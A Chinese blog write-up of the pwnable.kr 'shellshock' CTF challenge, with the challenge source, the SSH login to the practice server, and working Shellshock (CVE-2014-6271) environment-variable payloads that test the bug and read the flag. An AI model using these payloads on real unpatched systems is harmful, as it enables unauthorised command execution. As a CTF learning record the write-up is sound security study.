pwnable-shellshock

最新推荐文章于 2023-05-03 15:57:37 发布
最新推荐文章于 2023-05-03 15:57:37 发布
阅读量1.3k 收藏
点赞数
分类专栏: # PWN 文章标签: pwnable writeup 网络安全 安全漏洞 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122788533
版权

文章目录

概述

pwnable是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是shellshock,主要考察的是破壳漏洞的利用。

在这里插入图片描述

题目

题目描述

题目提示 there was a shocking news about bash,提示有个bash相关的震惊的消息,结合题目名称shellshock,可以看出考察的是破壳漏洞相关知识点。

连接信息

通过ssh登录靶机

ssh shellshock@pwnable.kr -p2222 (pw:guest)

在这里插入图片描述

基本信息

使用file查看文件属性
在这里插入图片描述

查看基本信息,可以看到NX启用

checksec shellshock

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

直接运行
在这里插入图片描述

查看源代码

shellshock.c

#include <stdio.h>
int main(){
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}

源代码分析

可以看到是调用家目录下的二进制文件bash进行命令执行,那这个bash有没有受到破壳漏洞影响?可以通过如下命令测试

env x='() { :;}; echo; echo vulnerable' ./bash -c :

可以看到,家目录下的bash存在破壳漏洞
在这里插入图片描述

题目解法

执行命令得到flag

env x='() { :;}; /bin/cat flag' ./shellshock

在这里插入图片描述

galaxy3000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Lab-03--Shellshock.zip
12-22
Shellshock漏洞详解及其在Linux环境下的防范》 Shellshock漏洞,全名是BASH(Bourne Again SHell)漏洞,是2014年9月被发现的一个严重安全漏洞,影响了广泛使用的Unix/Linux操作系统及基于这些系统的服务器、路由器...
UA-SHELLSHOCK:通过用户代理注入 Chrome 扩展命令
06-20
UA-SHELLSHOCK 通过“用户代理”的 Chrome 扩展命令注入。活动图标非活动图标信息该项目具有教育意义,只是展示了为 google chrome 创建扩展以利用最近的 Bash 漏洞是多么容易。 激活扩展时,任何浏览插件的页面都会...
pwnable-blackjack
网安星空
02-08 830
pwnable.kr是一个经典的CTFPWN方向练习的专业网站,本文记录的题目是blackjack,主要考察的是游戏类代码逻辑漏洞的利用。
pwnable-coin1
网安星空
02-07 2719
pwnable.kr是一个经典的CTFPWN方向练习的专业网站,本文记录的题目是coin1,主要考察的是游戏类代码逻辑漏洞的利用。
PWN刷题】Pwnable-Start、Pwnable-orw
最新发布
QYbudong的博客
05-03 1449
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
小白pwn之旅之pwnable01
qq_41078843的博客
04-27 507
pwnable----fd和collsion 本人是萌新无意间看到这个pwnable.kr的网站,来学习学习,嘿嘿。这里是链接 这里的一个小tip。由于我用的是Ubuntu18.04版本在用ssh连接时报错,记录一下解决方法。 vim /etc/host 再将pwnable.kr的IP地址加在后面就行了 fd ssh链接网址 ssh fd@pwnable.kr -p2222 输入默认密码...
pwnable学习心得(一)
dezang2878的博客
02-17 235
前言:pwnable.kr这个学习网站是我学习pwn过程中主要肝的一个网站,因为要考研等种种原因没有办法继续肝题,写这个系列是希望对自己已经会了题进行一个总结,以及以我这种萌新的角度对题目的理解希望能帮助到各位初学者,有说的不对的地方还请多指教。 我理解的pwn是寻找服务器程序的漏洞,利用漏洞达到控制服务器的目的,在题目中体现为获取flag,因此我们需要做的事情有两件: 1.找...
Bash漏洞-Shellshock浅析.pdf
07-10
【Bash漏洞与Shellshock】 Bash漏洞,又称为Shellshock,是指在2014年发现的一种严重安全漏洞,影响了广泛使用的Bash shell程序。Bash是Unix-like操作系统,包括Linux和Mac OS X的默认命令行解释器。这个漏洞的存在...
Xpl-SHELLSHOCK-Ch3ck:该工具注入恶意用户代理,允许探索运行服务器端命令的 vulnerabildiade sheelshock
06-08
Xpl-SHELLSHOCK-Ch3ck 该工具注入恶意用户代理,允许探索运行服务器端命令的 vulnerabildiade shellshock。 # SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] # EXPLOIT NAME: Xpl SHELLSHOCK Ch...
TurboPower ShellShock-开源
07-01
ShellShock 提供了一组组件,让您可以使用 Windows Shell 和 Windows 资源管理器中提供的功能自定义应用程序,而无需编写代码。 这些组件是用原生 VCL 为 Borland Delphi 和 C++Builder 编写的。
Pwnable
03-26
Pwnable
pwnable 笔记 Rookiss - fsb - 20 pt
HiTaQini
12-17 3139
典型的格式化字符串漏洞
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1351
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
pwnable.kr之shellshock
river
05-04 1084
shellshock 登陆上服务器看到有shellshock文件,还有一个bash文件,执行./shellshock shellshock不是CVE-20146271吗? 根据搜到的结果进行测试: 正常执行过程分析 Bash有一种独有的使用环境变量来定义函数的方法。如果环境变量的值以字符”(){”开头,那么这个变量就会被当作是一个导
shellshocke - pwnable
SkYe's Blog
09-01 310
shellshocke - pwnable 题目 连接服务器:ssh shellshock@pwnable.kr -p2222 (pw:guest) shellshock源码: #include <stdio.h> int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), ...
pwnable shellshock wp
moep0的博客
11-07 221
查看当前用户:whoami groups 查看当前登录用户的组内成员 groups test 查看test用户所在的组,以及组内成员 考察知识点 CVE-2014-6271(破壳漏洞) GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行Shell命令。某些服务和应用允...
pwnable.kr-----解题过程】shellshock
lyuchen65的博客
09-16 1231
#include int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system("/home/shellshock/bash -c 'echo shock_me'"); return 0; }根据题目一下子可以看出来这是shellshoc
pwnable.kr之simple login详解
Bill
04-26 2095
学习二进制不容易,大家要忍得住寂寞,耐得住孤独,进入正题. 总体思路: 输入更多的数据,溢出,修改main的返回值地址,使其返回到correct中,从而获取shell. 大家可能会有疑问:为什么不修改auth函数的返回值地址,跳到correct中.这是因为长度不够,我们需要输入16个字节的长度,才能覆盖返回值地址,但是程序只给了我们12个字节的长度. main函数int main(int
[WriteUp] pwnable.kr -- [shellshock]
qq_23026851的博客
07-31 466
题目: 解: 登录 检测是否存在shellshock漏洞: 上图有意思的地方在于,当输入“bash”时,没有触发shellshock漏洞;而“./bash”则触发了。究其原因,该服务器默认的bash程序没有shellshock漏洞,而当前目录下的这个vulnerable的“bash”是供我们练习专用的。 Shellshock的原理已经被探讨了很多,简单总结一下就是,当环境变量X被如此...
shellshock
03-16
Shellshock是一个严重的计算机安全漏洞,影响了许多操作系统和应用程序。它允许攻击者通过特殊构造的命令来执行恶意代码,从而控制受感染的系统。Shellshock漏洞最初被发现于2014年,但仍然是一个重要的安全问题。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值